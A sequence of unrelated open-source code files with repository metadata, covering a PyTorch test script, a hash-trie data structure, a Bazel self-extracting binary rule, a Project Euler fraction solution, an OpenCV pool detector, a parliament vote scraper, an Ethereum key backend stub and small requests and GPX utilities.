criterion = nn.CrossEntropyLoss().to(embedmodel.device)
logger = set_logger()
if args.checkpoint_path:
checkpoint = torch.load(args.checkpoint_path)
if len(args.gpu) == 1:
new_state_dict = {k.replace('module.', ''): v for k, v in checkpoint["embed_model"].items()}
embedmodel.load_state_dict(new_state_dict)
else:
embedmodel.load_state_dict(checkpoint["embed_model"])
model.load_state_dict(checkpoint["model"])
test_type = [checkpoint["type"]]
logger.info("Test Type:\t{}".format(checkpoint["type"]))
else:
        test_type = args.score_type  # fall back to the --score_type argument when no checkpoint is given
embedmodel = embedmodel.to(embedmodel.device)
model = model.to(embedmodel.device)
test(iter=test_iter, logger=logger, model=model, embed_model=embedmodel, crit=criterion, score_type=test_type)
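# Example invocation (all paths are placeholders):
# python test.py --tableA_path data/tableA.csv --tableB_path data/tableB.csv \
#     --train_path data/train.csv --val_path data/valid.csv --test_path data/test.csv \
#     --checkpoint_path checkpoints/model.pth --score_type mean max --batch_size 8 --gpu 0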
|
ChenRunjin/GNEM
|
test.py
|
test.py
|
py
| 6,754
|
python
|
en
|
code
| 5
|
github-code
|
6
|
41254027126
|
from copy import copy, deepcopy
from itertools import izip
from burrahobbit.util import all
SENTINEL = object()
SHIFT = 5
BMAP = (1 << SHIFT) - 1
BRANCH = 2 ** SHIFT
MAXBITMAPDISPATCH = 16
def relevant(hsh, shift):
""" Return the relevant part of the hsh on the level shift. """
return hsh >> shift & BMAP
POPCOUNT_TBL = [0] * (2 ** 16)
for idx in xrange(2 ** 16):
POPCOUNT_TBL[idx] = (idx & 1) + POPCOUNT_TBL[idx >> 1]
def bit_count(v):
return (POPCOUNT_TBL[v & 0xffff] +
POPCOUNT_TBL[(v >> 16) & 0xffff])
def doc(docstring):
""" Decorator to set docstring of function to docstring. """
def deco(fn):
""" Implementation detail. """
fn.__doc__ = docstring
return fn
return deco
ASSOC = "\n".join([
"Add AssocNode node whose key's hash is hsh to the node or its children.",
"shift refers to the current level in the tree, which must be a multiple",
"of the global constant BRANCH. If a node with the same key already",
"exists, override it.",
])
IASSOC = "\n".join([
"Modify so that the AssocNode whose key's hash is hsh is added to it.",
"USE WITH CAUTION.",
"shift refers to the current level in the tree, which must be a multiple",
"of the global constant BRANCH. If a node with the same key already",
"exists, override it.",
])
GET = "\n".join([
"Get value of the AssocNode with key whose hash is hsh in the subtree.",
"shift refers to the current level in the tree, which must be a multiple",
"of the global constant BRANCH.",
])
WITHOUT = "\n".join([
"Remove AssocNode with key whose hash is hsh from the subtree.",
"shift refers to the current level in the tree, which must be a multiple",
"of the global constant BRANCH.",
])
IWITHOUT = "\n".join([
"Modify so that the AssocNode whose key's hash is hsh is removed from it.",
"USE WITH CAUTION.",
"shift refers to the current level in the tree, which must be a multiple",
"of the global constant BRANCH.",
])
class Node(object):
__slots__ = []
def __and__(self, other):
new = NULLNODE
for node in other:
try:
self.get(hash(node.key), 0, node.key)
except KeyError:
pass
else:
new = new._iassoc(hash(node.key), 0, node)
return new
def __xor__(self, other):
new = self
for node in other:
new = new.xor(node.hsh, 0, node)
return new
def __or__(self, other):
new = self
for node in other:
new = new.assoc(node.hsh, 0, node)
return new
def __eq__(self, other):
return all(node == othernode for node, othernode in izip(self, other))
    def __ne__(self, other):
return any(node != othernode for node, othernode in izip(self, other))
class NullNode(Node):
""" Dummy node being the leaf of branches that have no entries. """
__slots__ = []
def xor(self, hsh, shift, node):
return node
_ixor = xor
@doc(ASSOC)
def assoc(self, hsh, shift, node):
# Because there currently no node, the new node
# is the node to be added.
return node
# The NullNode does not need to be modified if a new association is
# created because it only returns the new node, hence _iassoc = assoc.
_iassoc = assoc
def get(self, hsh, shift, key):
# There is no entry with the searched key because the hash leads
# to a branch ending in a NullNode.
raise KeyError(key)
@doc(WITHOUT)
def without(self, hsh, shift, key):
# There is no entry with the key to be removed because the hash leads
# to a branch ending in a NullNode.
raise KeyError(key)
_iwithout = without
def __iter__(self):
# There are no keys contained in a NullNode. Hence, an empty
# iterator is returned.
return iter([])
# Likewise, there are no values and items in a NullNode.
iteritems = itervalues = __iter__
def __copy__(self):
return self
def cutoff(self, hsh):
return self
# We only need one instance of a NullNode because it does not contain
# any data.
NULLNODE = NullNode()
class HashCollisionNode(Node):
""" If hashes of two keys collide, store them in a list and when a key
is searched, iterate over that list and find the appropriate key. """
__slots__ = ['children', 'hsh']
def __init__(self, nodes):
self.children = nodes
self.hsh = hash(nodes[0].hsh)
def xor(self, hsh, shift, node):
if not any(node.key == child.key for child in self.children):
return HashCollisionNode(self.children + [node])
return self
def _ixor(self, hsh, shift, node):
if not any(node.key == child.key for child in self.children):
self.children.append(node)
return self
@doc(GET)
def get(self, hsh, shift, key):
# To get the child we want we need to iterate over all possible ones.
# The contents of children are always AssocNodes,
# so we can safely access the key member.
for node in self.children:
if key == node.key:
return node
raise KeyError(key)
@doc(ASSOC)
def assoc(self, hsh, shift, node):
# If we have yet another key with a colliding key, return a new node
# with it added to the children, otherwise return a DispatchNode.
if hsh == self.hsh:
return HashCollisionNode(self.children + [node])
return DispatchNode.make(shift, [self, node])
@doc(IASSOC)
def _iassoc(self, hsh, shift, node):
# If we have yet another key with a colliding key, add it to the
# children, otherwise return a DispatchNode.
if hsh == self.hsh:
self.children.append(node)
return self
return DispatchNode.make(shift, [self, node])
@doc(WITHOUT)
def without(self, hsh, shift, key):
# Remove the node whose key is key from the children. If it was the
# last child, return NULLNODE. If there was no member with a
# matching key, raise KeyError.
newchildren = [node for node in self.children if node.key != key]
if not newchildren:
return NULLNODE
if newchildren == self.children:
raise KeyError(key)
return HashCollisionNode(newchildren)
@doc(IWITHOUT)
def _iwithout(self, hsh, shift, key):
newchildren = [node for node in self.children if node.key != key]
if not newchildren:
return NULLNODE
if newchildren == self.children:
raise KeyError(key)
self.children = newchildren
return self
def __iter__(self):
for node in self.children:
for elem in node:
yield elem
def __copy__(self):
return HashCollisionNode(map(copy, self.children))
def cutoff(self, hsh):
if self.hsh <= hsh:
return NULLNODE
return self
class ListDispatch(Node):
""" Light weight dictionary like object for a little amount of items.
Only feasable for a little amount of items as a list of length nitems
is always stored.
Only accepts integers as keys. """
__slots__ = ['items']
def __init__(self, nitems=None, items=None):
if items is None:
items = [SENTINEL for _ in xrange(nitems)]
self.items = items
def replace(self, key, item):
""" Return a new ListDispatch with the the keyth item replaced
with item. """
return ListDispatch(
None,
self.items[:key] +
[item] +
self.items[key + 1:]
)
def _ireplace(self, key, item):
""" Replace keyth item with item.
USE WITH CAUTION. """
self.items[key] = item
return self
def __getitem__(self, key):
value = self.items[key]
if value is SENTINEL:
raise KeyError(key)
return value
def get(self, key, default):
""" Get keyth item. If it is not present, return default. """
value = self.items[key]
if value is not SENTINEL:
return value
return default
def remove(self, key):
""" Return new ListDispatch with keyth item removed.
Will not raise KeyError if it was not present. """
return self.replace(key, SENTINEL)
def _iremove(self, key):
""" Remove keyth item. Will not raise KeyError if it was not present.
USE WITH CAUTION. """
self._ireplace(key, SENTINEL)
return self
def to_bitmapdispatch(self):
dispatch = BitMapDispatch()
for key, value in enumerate(self.items):
if value is not SENTINEL:
dispatch._ireplace(key, value)
return dispatch
def __iter__(self):
return (item for item in self.items if item is not SENTINEL)
def __copy__(self):
return ListDispatch(items=self.items[:])
def __deepcopy__(self):
return ListDispatch(items=map(deepcopy, self.items))
def map(self, fn):
newitems = []
for elem in self.items:
if elem is not SENTINEL:
elem = fn(elem)
newitems.append(elem)
return ListDispatch(items=newitems)
class BitMapDispatch(Node):
""" Light weight dictionary like object for a little amount of items.
Best used for as most as many items as an integer has bits (usually 32).
Only accepts integers as keys.
The items are stored in a list and whenever an item is added, the bitmap
is ORed with (1 << key) so that the keyth bit is set.
The amount of set bits before the nth bit is used to find the index of the
item referred to by key in the items list.
"""
__slots__ = ['bitmap', 'items']
def __init__(self, bitmap=0, items=None):
if items is None:
items = []
self.bitmap = bitmap
self.items = items
def replace(self, key, item):
""" Return a new BitMapDispatch with the the keyth item replaced
with item. """
# If the item already existed in the list, we need to replace it.
# Otherwise, it will be added to the list at the appropriate
# position.
if len(self.items) >= MAXBITMAPDISPATCH:
new = self.to_listdispatch(BRANCH)
return new._ireplace(key, item)
notnew = bool(self.bitmap & 1 << key)
newmap = self.bitmap | 1 << key
idx = bit_count(self.bitmap & ((1 << key) - 1))
return BitMapDispatch(
newmap,
# If notnew is True, the item that is replaced by the new item
# is left out, otherwise the new item is inserted. Refer to
# _ireplace for a more concise explanation.
self.items[:idx] + [item] + self.items[idx+notnew:]
)
def _ireplace(self, key, item):
""" Replace keyth item with item.
USE WITH CAUTION. """
if len(self.items) >= MAXBITMAPDISPATCH:
new = self.to_listdispatch(BRANCH)
return new._ireplace(key, item)
notnew = bool(self.bitmap & 1 << key)
self.bitmap |= 1 << key
idx = bit_count(self.bitmap & ((1 << key) - 1))
if idx == len(self.items):
self.items.append(item)
elif notnew:
self.items[idx] = item
else:
self.items.insert(idx, item)
return self
def get(self, key, default=None):
""" Get keyth item. If it is not present, return default. """
if not self.bitmap & 1 << key:
return default
return self.items[bit_count(self.bitmap & ((1 << key) - 1))]
def remove(self, key):
""" Return new BitMapDispatch with keyth item removed.
Will not raise KeyError if it was not present. """
idx = bit_count(self.bitmap & ((1 << key) - 1))
return BitMapDispatch(
# Unset the keyth bit.
self.bitmap & ~(1 << key),
# Leave out the idxth item.
self.items[:idx] + self.items[idx+1:]
)
def _iremove(self, key):
""" Remove keyth item. Will not raise KeyError if it was not present.
USE WITH CAUTION. """
idx = bit_count(self.bitmap & ((1 << key) - 1))
self.bitmap &= ~(1 << key)
self.items.pop(idx)
return self
def __getitem__(self, key):
if not self.bitmap & 1 << key:
raise KeyError(key)
return self.items[bit_count(self.bitmap & ((1 << key) - 1))]
def to_listdispatch(self, nitems):
""" Return ListDispatch with the same key to value connections as this
BitMapDispatch. """
return ListDispatch(
None, [self.get(n, SENTINEL) for n in xrange(nitems)]
)
def __iter__(self):
return iter(self.items)
def __nonzero__(self):
return bool(self.items)
def __copy__(self):
return BitMapDispatch(self.bitmap, self.items[:])
def __deepcopy__(self):
return BitMapDispatch(self.bitmap, map(deepcopy, self.items))
def map(self, fn):
return BitMapDispatch(
self.bitmap,
[fn(elem) for elem in self.items]
)
class DispatchNode(Node):
""" Dispatch to children nodes depending of the hsh value at the
current level. """
__slots__ = ['children']
def __init__(self, children=None):
if children is None:
children = BitMapDispatch()
self.children = children
def xor(self, hsh, shift, node):
rlv = relevant(hsh, shift)
newchild = self.children.get(rlv, NULLNODE).xor(hsh, shift + SHIFT, node)
if newchild is NULLNODE:
# This makes sure no dead nodes remain in the tree after
# removing an item.
newchildren = self.children.remove(rlv)
if not newchildren:
return NULLNODE
else:
newchildren = self.children.replace(
rlv,
newchild
)
return DispatchNode(newchildren)
def _ixor(self, hsh, shift, node):
rlv = relevant(hsh, shift)
newchild = self.children[rlv].xor(hsh, shift + SHIFT, node)
if newchild is NULLNODE:
self.children = self.children._iremove(rlv)
if not self.children:
return NULLNODE
else:
self.children = self.children._ireplace(rlv, newchild)
return self
@doc(ASSOC)
def assoc(self, hsh, shift, node):
# We need not check whether the return value of
# self.children.get(...).assoc is NULLNODE, because assoc never
# returns NULLNODE.
rlv = relevant(hsh, shift)
return DispatchNode(
self.children.replace(
rlv,
self.children.get(rlv, NULLNODE).assoc(
hsh, shift + SHIFT, node
)
)
)
@doc(IASSOC)
def _iassoc(self, hsh, shift, node):
rlv = relevant(hsh, shift)
self.children = self.children._ireplace(
rlv,
self.children.get(rlv, NULLNODE)._iassoc(hsh, shift + SHIFT, node)
)
return self
@classmethod
def make(cls, shift, many):
# Because the object we create in this function is not yet exposed
# to any other code, we may safely call _iassoc.
dsp = cls()
for elem in many:
dsp = dsp._iassoc(elem.hsh, shift, elem)
return dsp
@doc(GET)
def get(self, hsh, shift, key):
return self.children.get(relevant(hsh, shift), NULLNODE).get(
hsh, shift + SHIFT, key
)
@doc(WITHOUT)
def without(self, hsh, shift, key):
rlv = relevant(hsh, shift)
newchild = self.children[rlv].without(hsh, shift + SHIFT, key)
if newchild is NULLNODE:
# This makes sure no dead nodes remain in the tree after
# removing an item.
newchildren = self.children.remove(rlv)
if not newchildren:
return NULLNODE
else:
newchildren = self.children.replace(
rlv,
newchild
)
return DispatchNode(newchildren)
@doc(IWITHOUT)
def _iwithout(self, hsh, shift, key):
rlv = relevant(hsh, shift)
newchild = self.children[rlv]._iwithout(hsh, shift + SHIFT, key)
if newchild is NULLNODE:
self.children = self.children._iremove(rlv)
if not self.children:
return NULLNODE
else:
self.children = self.children._ireplace(rlv, newchild)
return self
def __iter__(self):
for child in self.children:
for elem in child:
yield elem
def __copy__(self):
return DispatchNode(self.children.map(copy))
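# Illustration (not part of the original module): how BitMapDispatch maps a key
# to a position in its compact items list using the popcount trick.
def _bitmap_index_example(bitmap, key):
    # The number of set bits below `key` is the item's index in the list.
    return bit_count(bitmap & ((1 << key) - 1))

# Example: keys 1, 4 and 9 present -> bitmap = 0b1000010010, and
# _bitmap_index_example(0b1000010010, 4) == 1, because only key 1 is stored before it.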
|
fmayer/burrahobbit
|
burrahobbit/_tree.py
|
_tree.py
|
py
| 17,423
|
python
|
en
|
code
| 8
|
github-code
|
6
|
9162832850
|
def _self_extract_binary(ctx):
"""Implementation for the self_extract_binary rule."""
# This is a bit complex for stripping out timestamps
zip_artifact = ctx.actions.declare_file(ctx.label.name + ".zip")
touch_empty_files = [
"mkdir -p $(dirname ${tmpdir}/%s); touch ${tmpdir}/%s" % (f, f)
for f in ctx.attr.empty_files
]
cp_resources = [
("mkdir -p $(dirname ${tmpdir}/%s)\n" % r.short_path +
"cp %s ${tmpdir}/%s" % (r.path, r.short_path))
for r in ctx.files.resources
]
cp_flatten_resources = [
"cp %s ${tmpdir}/%s" % (r.path, r.basename)
for r in ctx.files.flatten_resources
]
ctx.actions.run_shell(
inputs = ctx.files.resources + ctx.files.flatten_resources,
outputs = [zip_artifact],
command = "\n".join([
"tmpdir=$(mktemp -d ${TMPDIR:-/tmp}/tmp.XXXXXXXX)",
"trap \"rm -fr ${tmpdir}\" EXIT",
] + touch_empty_files + cp_resources + cp_flatten_resources + [
"find ${tmpdir} -exec touch -t 198001010000.00 '{}' ';'",
"(d=${PWD}; cd ${tmpdir}; zip -rq ${d}/%s *)" % zip_artifact.path,
]),
mnemonic = "ZipBin",
)
ctx.actions.run_shell(
inputs = [ctx.file.launcher, zip_artifact],
outputs = [ctx.outputs.executable],
command = "\n".join([
"cat %s %s > %s" % (
ctx.file.launcher.path,
zip_artifact.path,
ctx.outputs.executable.path,
),
"zip -qA %s" % ctx.outputs.executable.path,
]),
mnemonic = "BuildSelfExtractable",
)
self_extract_binary = rule(
_self_extract_binary,
attrs = {
"launcher": attr.label(
mandatory = True,
allow_single_file = True,
),
"empty_files": attr.string_list(default = []),
"resources": attr.label_list(
default = [],
allow_files = True,
),
"flatten_resources": attr.label_list(
default = [],
allow_files = True,
),
},
executable = True,
)
|
bazelbuild/bazel
|
scripts/packages/self_extract_binary.bzl
|
self_extract_binary.bzl
|
bzl
| 2,138
|
python
|
en
|
code
| 21,632
|
github-code
|
6
|
26470959901
|
""" Problem 71: Ordered Fractions
https://projecteuler.net/problem=71
Goal: By listing the set of reduced proper fractions for d <= N in ascending
order of size, find the numerator and denominator of the fraction immediately to
the left of n/d.
Constraints: 1 <= n < d <= 1e9, gcd(n, d) == 1, d < N <= 1e15
Reduced Proper Fraction: A fraction n/d, where n & d are positive integers,
n < d, and gcd(n, d) == 1.
Farey Sequence: A sequence of completely reduced fractions, either between 0 and
1, or which when in reduced terms have denominators <= N, arranged in order of
increasing size. The sequence optionally begins with 0/1 and ends with 1/1 if
restricted. The middle term of a Farey sequence is always 1/2 for N > 1.
e.g. if d <= 8, the Farey sequence would be ->
1/8, 1/7, 1/6, 1/5, 1/4, 2/7, 1/3, 3/8, 2/5, 3/7, 1/2, 4/7, 3/5,
5/8, 2/3, 5/7, 3/4, 4/5, 5/6, 6/7, 7/8
e.g.: N = 8, n = 3, d = 7
ans = 2/5
"""
from fractions import Fraction
from math import gcd
def left_farey_neighbour(limit: int, n: int, d: int) -> tuple[int, int]:
"""
Solution finds Farey sequence neighbours based on the following:
If a/b and n/d are neighbours, with a/b < n/d, then their difference:
n/d - a/b = (nb - ad)/(db)
with nb - ad = 1, it becomes ->
n/d - a/b = 1/(db)
A mediant fraction can be found between 2 neighbours using:
p/q = (a + n)/(b + d)
This solution could also be implemented similarly using a Stern-Brocot Tree
fraction search algorithm that uses binary search to recursively find the
target fraction n/d starting from the left & right ancestors, 0/1 & 1/0. Once
found, the last left boundary is used with the target to find all mediants
until a new mediant's denominator exceeds limit.
SPEED (WORSE)
12.03s for N = 1e7
SPEED (Impossible for N > 1e10)
:returns: Tuple of (numerator, denominator) representing the fraction to the
left of n/d.
"""
upper_bound = Fraction(n, d)
lower_bound = Fraction(n, d + 1) if d != limit else Fraction(n - 1, d)
half = Fraction(1, 2)
if lower_bound < half < upper_bound:
lower_bound = half
neighbour = Fraction()
while True:
delta = upper_bound - lower_bound
neighbour_delta = Fraction(1, lower_bound.denominator * d)
if delta == neighbour_delta:
neighbour = lower_bound
lower_bound = Fraction(
lower_bound.numerator + n,
lower_bound.denominator + d
)
if lower_bound.denominator > limit and neighbour != Fraction():
break
return neighbour.numerator, neighbour.denominator
def compare_fractions(
fraction_a: tuple[int, int],
fraction_b: tuple[int, int]
) -> int:
"""
Rather than compare Doubles, whole numbers are compared based on the
property that:
if a/b < n/d, then ad < bn
:returns: -1 if fraction_a < fraction_b; 1 if fraction_a > fraction_b; 0 if
both equal.
"""
left = fraction_a[0] * fraction_b[1]
right = fraction_a[1] * fraction_b[0]
if left == right:
return 0
return -1 if left < right else 1
def reduce_fraction(numerator: int, denominator: int) -> tuple[int, int]:
divisor = gcd(numerator, denominator)
return numerator // divisor, denominator // divisor
def left_farey_neighbour_improved(limit: int, n: int, d: int) -> tuple[int, int]:
"""
Solution improved based on the following:
For each denominator b up to N, the only fraction that needs to be considered
is the one with the largest numerator a for which a/b < n/d.
a/b < n/d becomes ad < bn, which means ad <= bn - 1
a <= floor((bn - 1)/d)
for b <= N, floor((bn - 1)/d)/b is the largest fraction.
Fractions with larger denominators are spaced more closely than those with
smaller denominators, so iterating backwards starting at N means the largest
neighbour below n/d will be found sooner. The loop is broken based on the
aforementioned property that:
the difference between 2 neighbours is given as 1/(db)
for a new fraction r/s to be closer to n/d than a/b ->
1/(ds) < (nb - da)/(db) -> s > b/(nb - da)
if delta = nb - da = 1, this means s > b, & the loop can be broken as all
denominators between b and N have already been examined.
N.B. Using the Fraction class from the fractions library is helpful as an
instance intrinsically reduces itself & comparisons & arithmetic operations
are more easily implemented; however, its use reduced the execution speed to
405.98s for N = 1e15, a ~4x reduction in performance.
SPEED (BETTER)
3.9e4ns for N = 1e7
SPEED (BETTER)
93.99s for N = 1e15
:returns: Tuple of (numerator, denominator) representing the fraction to the
left of n/d.
"""
closest_neighbour = 0, 1
b = limit # current denominator starts at provided limit
min_b = 1
while b >= min_b:
a = (b * n - 1) // d # current numerator
current = a, b
# if closest_a / closest_b < current_a / current_b
if compare_fractions(closest_neighbour, current) == -1:
closest_neighbour = reduce_fraction(a, b)
delta = n * b - d * a
min_b = b // delta + 1
b -= 1
return closest_neighbour
def extended_gcd(n1: int, n2: int) -> tuple[int, int, int]:
"""
Implements the Extended Euclidean Algorithm that calculates, in addition to
gcd(n1, n2), the coefficients of Bezout's identity, integers x and y
such that:
ax + by = gcd(a, b)
:returns: Tuple of (gcd, x, y).
:raises ValueError: If either n1 or n2 is less than 0.
"""
if n1 < 0 or n2 < 0:
raise ValueError("Integers should not be negative")
if n1 == 0:
return n2, 0, 1
e_gcd, x, y = extended_gcd(n2 % n1, n1)
return e_gcd, y - n2 // n1 * x, x
def left_farey_neighbour_optimised(limit: int, n: int, d: int) -> tuple[int, int]:
"""
Solution optimised by taking advantage of the Extended Euclidean Algorithm
that generates coefficients x and y, in addition to the gcd.
When a and b are co-prime, x will be the modular multiplicative inverse of
a % b and y will be the modular multiplicative inverse of b % a. Remember
that the modular multiplicative inverse of an integer a is an integer x such
that the product ax is congruent to 1 with respect to the modulus b.
SPEED (BEST)
5700ns for N = 1e7
SPEED (BEST)
1.9e4ns for N = 1e15
:returns: Tuple of (numerator, denominator) representing the fraction to the
left of n/d.
"""
# Python modulus intrinsically handles cases when x is negative
mod_inverse_of_n = extended_gcd(n, d)[1] % d
new_d = limit % d - mod_inverse_of_n
if new_d < 0:
new_d += d
neighbour_denom = limit - new_d
neighbour_num = (neighbour_denom * n - 1) // d
return neighbour_num, neighbour_denom
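# Quick sanity check (a sketch, not part of the original solution file): all three
# implementations should agree on the example from the module docstring,
# N = 8, n = 3, d = 7 -> 2/5.
if __name__ == "__main__":
    assert left_farey_neighbour(8, 3, 7) == (2, 5)
    assert left_farey_neighbour_improved(8, 3, 7) == (2, 5)
    assert left_farey_neighbour_optimised(8, 3, 7) == (2, 5)
    print("All three implementations return 2/5 for N=8, n=3, d=7")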
|
bog-walk/project-euler-python
|
solution/batch7/problem71.py
|
problem71.py
|
py
| 7,025
|
python
|
en
|
code
| 0
|
github-code
|
6
|
24455754580
|
# -*- coding: utf-8 -*-
"""
@author: Fatih Kemal Terzi
"""
import cv2
import numpy as np
# Image reading
img = cv2.imread('pools.png')
count=0
# Convert the image to HSV color space
hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)
# Adjusting range of blue color for detecting pools
lower_blue = np.array([80,50,50])
upper_blue = np.array([115,255,255])
# Create a binary mask that isolates the blue regions
mask = cv2.inRange(hsv, lower_blue, upper_blue)
# Perform morphological operations to reduce noise
kernel = np.ones((5,5),np.uint8)
mask = cv2.morphologyEx(mask, cv2.MORPH_OPEN, kernel)
mask = cv2.morphologyEx(mask, cv2.MORPH_CLOSE, kernel)
# Find contours of blue regions
contours, _ = cv2.findContours(mask, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
# Draw bounding boxes around the blue regions
for cnt in contours:
x, y, w, h = cv2.boundingRect(cnt)
cv2.rectangle(img, (x, y), (x + w, y + h), (0, 0, 255), 2)
count+=1
# Display the result
cv2.imshow('Detected_pools', img)
print('Number of pools : ',count)
cv2.waitKey(0)
cv2.destroyAllWindows()
|
FatihKemalTerzi/Image-Processing
|
Midterm3.py
|
Midterm3.py
|
py
| 1,105
|
python
|
en
|
code
| 0
|
github-code
|
6
|
10502033252
|
# https://www.geeksforgeeks.org/find-the-smallest-positive-number-missing-from-an-unsorted-array/
def missing(res):
    # Index-marking technique: for each value v in 1..N, flip the sign of res[v-1]
    # to record that v is present; the first index left positive then gives the
    # smallest missing positive number.
    N = len(res)
    for i in range(0, N):
        val = abs(res[i])
        if val <= N and val > 0:
            res[val-1] = -abs(res[val-1])
    # print(res)
    for i in range(0, N):
        if res[i] > 0:
            return i+1
    # all values 1..N are present
    return N+1
if __name__ == '__main__':
arr = [1, 2, 3, 7, 6, 8, -1, -10, 15]
res = []
for item in arr:
        if item > 0:  # keep only positive values
res.append(item)
print(res)
print(missing(res))
|
anojkr/help
|
Array/smallest_missing_number_in_unsorted_array.py
|
smallest_missing_number_in_unsorted_array.py
|
py
| 455
|
python
|
en
|
code
| 0
|
github-code
|
6
|
3739410797
|
import requests
from bs4 import BeautifulSoup
import re
def get_vote_links(current_page):
"""Finds the vote page links on the main folktingspage.
Args:
main_page_soup (_type_): Takes in the main page with all the vote subpages as a soap object
Returns:
_type_: Returns a list of soap Objects with the links to the respective subpages
"""
prefix = 'https://www.ft.dk/'
a = current_page.find_all(attrs={'class':'column-documents__link'})
a = [prefix+x['href'] for x in a]
return a
def get_soup_page(url_page):
"""Converts URL into a BeautifulSoup object.
Args:
        url_page (str): the page URL, passed as a string.
    Returns:
        BeautifulSoup: the parsed page.
"""
response = requests.get(url_page)
page = BeautifulSoup(response.content, 'html.parser')
return page
def get_votes_by_party(vote_page) -> dict:
""" Takes a BeautifulSoup object and retrieves the votes by party
section, then strips it and modifies it so that it is returned in a fixed sized
dictionary containing parties, For, Against, Neutral counts.
Args:
vote_page (_type_): URL for the folketings vote_page
(e.g., https://www.ft.dk/samling/20042/afstemning/64.htm)
Returns:
dict: fixed sized dictionary containing parties, For, Against, Neutral, absent counts for each party
"""
table = vote_page.find("div", {"id":"tingdok_accordion_vote-2"})
dict = {'parties': [], 'For': [], 'Against':[], 'Neutral':[], 'Absent':[]}
regex_party = re.compile(r"\w* \(\w+\)")
regex_vote_num = re.compile(r"\d+")
for child in table.table.tbody.children:
if re.search(regex_party, child.text.strip()):
lst = child.text.strip().split("\r\n")
votes = []
for i in lst:
i = i.strip()
if re.search(regex_party,i):
party = i
dict['parties'].append(party)
elif re.search(regex_vote_num, i):
votes.append(i)
dict['For'].append(votes[0])
dict['Against'].append(votes[1])
dict['Neutral'].append(votes[2])
dict['Absent'].append(votes[3])
return dict
def get_votes(vote_page):
vote_section = vote_page.find("div", {"id": "tingdok_accordion_vote-3"})
votes = {
'politician': [],
'party': [],
'vote': []
}
for child in vote_section.tbody.children:
lst = child.text.strip().split("\n\r")
if len(lst) == 3:
person, party, vote = [x.strip() for x in lst]
votes['politician'].append(person)
votes['party'].append(party)
votes['vote'].append(vote)
return votes
def get_description_page(vote_page):
description_link = vote_page.find("a", {"class":"tingdok-backarrow"})
prefix = 'https://www.ft.dk/'
response = requests.get(prefix + description_link['href'])
description_page = BeautifulSoup(response.content, 'html.parser')
return description_page
def get_vote_info(description_page):
description_texts = description_page.find('div', {"class":"tingdok__caseinfospot-a__container"}).text.strip().splitlines()
info = []
for line in description_texts:
if line.strip() != "":
info.append(line.strip())
return info
def get_vote_id(vote_page):
return vote_page.h2.text
def get_title(description_page):
top_header = description_page.find("div", {"class":"tingdok__caseinfotopspot-a__container"})
return top_header.h1.text.strip()
def get_vote_caller(description_page):
top_header = description_page.find("div", {"class":"tingdok__caseinfotopspot-a__container"})
hosts_section = top_header.find("div", {"class":"tingdok-normal"})
meeting_hosts = []
for line in hosts_section:
clean_line = line.text.strip()
if len(clean_line)>5:
meeting_hosts.append(clean_line)
return meeting_hosts
def get_next_page(current_page):
    next_page_url = current_page.find("a", {"title":"Næste"})['href']
prefix = "https://www.ft.dk/dokumenter/dokumentlister/afstemninger"
np_response = requests.get(prefix + next_page_url)
return BeautifulSoup(np_response.content, 'html.parser')
def exists_next_page(current_page):
    next_link = current_page.find("a", {"title":"Næste"})
    if next_link is not None and next_link.get('href') is not None:
        return True
    else:
        return False
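# Minimal usage sketch (illustrative, untested): chains the helpers above. The overview URL is the
# same prefix used in get_next_page(); whether that page exposes 'column-documents__link' anchors
# is an assumption.
if __name__ == '__main__':
    overview_page = get_soup_page("https://www.ft.dk/dokumenter/dokumentlister/afstemninger")
    vote_links = get_vote_links(overview_page)
    if vote_links:
        first_vote_page = get_soup_page(vote_links[0])
        print(get_vote_id(first_vote_page))
        print(get_votes_by_party(first_vote_page))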
|
jonahank/Vote-Prediction-Model
|
utils/scraper_functions.py
|
scraper_functions.py
|
py
| 4,617
|
python
|
en
|
code
| 1
|
github-code
|
6
|
10138194613
|
from eth_keys.datatypes import (
PrivateKey,
PublicKey,
Signature,
)
class BaseECCBackend(object):
def __init__(self):
self.PublicKey = type(
'{0}PublicKey'.format(type(self).__name__),
(PublicKey,),
{'_backend': self},
)
self.PrivateKey = type(
'{0}PrivateKey'.format(type(self).__name__),
(PrivateKey,),
{'_backend': self},
)
self.Signature = type(
'{0}Signature'.format(type(self).__name__),
(Signature,),
{'_backend': self},
)
def ecdsa_sign(self, msg_hash, private_key):
raise NotImplementedError()
def ecdsa_verify(self, msg_hash, signature, public_key):
return self.ecdsa_recover(msg_hash, signature) == public_key
def ecdsa_recover(self, msg_hash, signature):
raise NotImplementedError()
def private_key_to_public_key(self, private_key):
raise NotImplementedError()
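# Sketch (illustrative): instantiating a backend binds the generated datatype subclasses to that
# instance, so each type carries a reference to the backend that created it.
if __name__ == '__main__':
    backend = BaseECCBackend()
    print(backend.PublicKey.__name__)             # BaseECCBackendPublicKey
    print(backend.PublicKey._backend is backend)  # True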
|
adithyabsk/loanchain
|
loanchain/lib/python2.7/site-packages/eth_keys/backends/base.py
|
base.py
|
py
| 1,000
|
python
|
en
|
code
| 5
|
github-code
|
6
|
75131970108
|
import requests
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36"}
# one way of passing query parameters
params = {"wd":"haha"}
# the trailing question mark is optional; if you leave it out, requests adds it for you
url_temp = "https://www.baidu.com/?"
# note which requests function you call: get vs post
r = requests.get(url_temp, headers=headers, params=params)
print(r.status_code)  # status code returned for the requested page
print(r.request.url)  # URL that was actually requested
# the version below is more concise
# .format behaves the same as %s formatting
url_2 = "https://www.baidu.com/?wd={}".format("haha")
r = requests.get(url_2, headers=headers)
print(r.status_code)  # status code returned for the requested page
print(r.request.url)  # URL that was actually requested
|
hahahei957/NewProject_Opencv2
|
venv_2/็ฌ่ซ/01_HelloWorld.py
|
01_HelloWorld.py
|
py
| 874
|
python
|
zh
|
code
| 0
|
github-code
|
6
|
9512772188
|
import sys
import pandas as pd
import numpy as np
import xml.dom.minidom
#from exercise 3
def output_gpx(points, output_filename):
"""
Output a GPX file with latitude and longitude from the points DataFrame.
"""
def append_trkpt(pt, trkseg, doc):
trkpt = doc.createElement('trkpt')
trkpt.setAttribute('lat', '%.8f' % (pt['lat']))
trkpt.setAttribute('lon', '%.8f' % (pt['lon']))
trkseg.appendChild(trkpt)
doc = xml.dom.minidom.getDOMImplementation().createDocument(None, 'gpx', None)
trk = doc.createElement('trk')
doc.documentElement.appendChild(trk)
trkseg = doc.createElement('trkseg')
